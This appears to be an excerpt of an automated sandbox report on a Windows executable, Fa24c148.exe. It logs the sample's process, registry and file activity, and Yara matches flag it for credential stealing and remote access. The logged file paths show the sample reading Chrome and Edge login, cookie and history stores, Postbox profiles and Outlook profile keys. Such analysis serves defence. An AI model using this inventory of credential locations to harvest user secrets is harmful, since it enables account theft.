Source: C:\Users\user\Desktop\Fa24c148.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Process created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Users\user\Desktop\Fa24c148.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\Fa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Yara match File source: 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR